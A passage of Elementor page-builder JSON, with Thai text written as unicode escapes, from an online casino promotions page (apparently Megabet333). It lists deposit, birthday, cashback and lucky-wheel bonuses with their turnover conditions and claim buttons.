\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a07 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49fe62a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4dc04\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"b25769f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Free_bonus_100_-_Megabet333-Biz.webp\",\"id\":158,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4e0d99f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 100%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"20cbe32\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"696\\\" data-end=\\\"711\\\">\\u0e04\\u0e38\\u0e49\\u0e21\\u0e2a\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e49\\u0e07<\\/strong> \\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/p><ul><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"743\\\" data-end=\\\"758\\\">100 \\u0e23\\u0e31\\u0e1a 200<\\/strong><\\/li><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"763\\\" data-end=\\\"780\\\">500 \\u0e23\\u0e31\\u0e1a 1,000<\\/strong><\\/li><\\/ul><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"798\\\" data-end=\\\"813\\\">\\u0e17\\u0e33 6 \\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>, <strong data-start=\\\"815\\\" data-end=\\\"835\\\">\\u0e16\\u0e2d\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"848\\\" data-end=\\\"886\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e15\\u0e31\\u0e14\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 (\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a)<\\/strong> \\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e14\\u0e22\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e16\\u0e2d\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c <strong data-start=\\\"945\\\" data-end=\\\"967\\\">1 \\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\/\\u0e27\\u0e31\\u0e19\\/\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"82869dd\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"174fb16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"498b0c4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/HBD_-_Megabet333-Biz.webp\",\"id\":159,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ae3dca7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy Birthday Bonus \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d7acfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\ud83c\\udf81 \\u0e09\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 \\u0e23\\u0e31\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e27\\u0e31\\u0e0d\\u0e15\\u0e32\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e19\\u0e31\\u0e49\\u0e19 <br \\/>(\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14)<\\/p><ul><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1480\\\" data-end=\\\"1496\\\">3,000 \\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b<\\/strong> \\u2192 <strong data-start=\\\"1499\\\" data-end=\\\"1513\\\">\\u0e23\\u0e31\\u0e1a\\u0e1f\\u0e23\\u0e35 300<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1529\\\" data-end=\\\"1542\\\">500\\u20132,999<\\/strong> \\u2192 <strong data-start=\\\"1545\\\" data-end=\\\"1555\\\">\\u0e23\\u0e31\\u0e1a 50<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1571\\\" data-end=\\\"1586\\\">\\u0e44\\u0e21\\u0e48\\u0e40\\u0e01\\u0e34\\u0e19 500<\\/strong> \\u2192 <strong data-start=\\\"1589\\\" data-end=\\\"1616\\\">\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 100%<\\/strong><\\/li><\\/ul><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1634\\\" data-end=\\\"1680\\\"><strong data-start=\\\"1634\\\" data-end=\\\"1653\\\">\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 5 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong>, <strong data-start=\\\"1655\\\" data-end=\\\"1678\\\">\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"1634\\\" data-end=\\\"1680\\\">\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e42\\u0e14\\u0e22 <strong data-start=\\\"1699\\\" data-end=\\\"1727\\\">\\u0e41\\u0e08\\u0e49\\u0e07\\u0e1a\\u0e31\\u0e15\\u0e23\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e32\\u0e0a\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e97b605\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9947189\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b558a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"0d72c4a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Reward_10_-_Megabet333-Biz.webp\",\"id\":160,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"54c71af\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 10%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"234d7b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1088\\\" data-end=\\\"1118\\\">\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32! \\u0e23\\u0e30\\u0e1a\\u0e1a <strong data-start=\\\"1844\\\" data-end=\\\"1878\\\">\\u0e41\\u0e1b\\u0e25\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21 Reward 10%<\\/strong> <br \\/>\\u0e19\\u0e33\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e1b\\u0e25\\u0e38\\u0e49\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e08\\u0e30\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49 \\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e41\\u0e25\\u0e01\\u0e41\\u0e15\\u0e49\\u0e21<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e04\\u0e34\\u0e14\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e1b\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e0b\\u0e47\\u0e19\\u0e15\\u0e4c\\u0e08\\u0e32\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2a\\u0e38\\u0e17\\u0e18\\u0e34 \\u0e15\\u0e32\\u0e21\\u0e23\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e2b\\u0e19\\u0e14<\\/li><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e2a\\u0e14\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e19\\u0e33\\u0e44\\u0e1b\\u0e41\\u0e25\\u0e01\\u0e15\\u0e32\\u0e21\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e25\\u0e01\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5ce39e5\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"21cd1ab\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"879b024\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Lucky_wheel_-_Megabet333-Biz.webp\",\"id\":156,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b5fc02\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lucky Wheel \\u0e01\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e42\\u0e0a\\u0e04 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a328cdd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e41\\u0e15\\u0e49\\u0e21 <strong data-start=\\\"75\\\" data-end=\\\"85\\\">Reward<\\/strong> \\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 <br \\/>\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e08\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19<\\/p><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"197\\\" data-end=\\\"250\\\">20 \\/ 50 \\/ 100 \\/ 150 \\/ 200 \\/ 250 \\/ 300 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a<\\/strong><\\/li><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"255\\\" data-end=\\\"275\\\">\\ud83c\\udf81 Mystery Prize<\\/strong>\\u00a0\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 (\\u0e40\\u0e0a\\u0e48\\u0e19 500 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15 <strong data-start=\\\"310\\\" data-end=\\\"318\\\">\\u0e2b\\u0e23\\u0e37\\u0e2d<\\/strong> \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 +1)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5aae432\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d6f8124\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4ce4610\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9e70ab2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e27\\u0e34\\u0e18\\u0e35\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e921159\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2531\\\" data-end=\\\"2570\\\">\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a \\u2192 \\u0e44\\u0e1b\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e19\\u0e39 <strong data-start=\\\"2555\\\" data-end=\\\"2568\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19<\\/strong><\\/li><li data-start=\\\"2574\\\" data-end=\\\"2643\\\">\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e14 <strong data-start=\\\"2599\\\" data-end=\\\"2614\\\">\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c<\\/strong> (\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e08\\u0e49\\u0e07\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e15\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38)<\\/li><li data-start=\\\"2647\\\" data-end=\\\"2706\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e02\\u0e49\\u0e32 <strong data-start=\\\"2662\\\" data-end=\\\"2675\\\">\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34<\\/strong> \\/ \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e33\\u0e40\\u0e23\\u0e47\\u0e08<\\/li><li 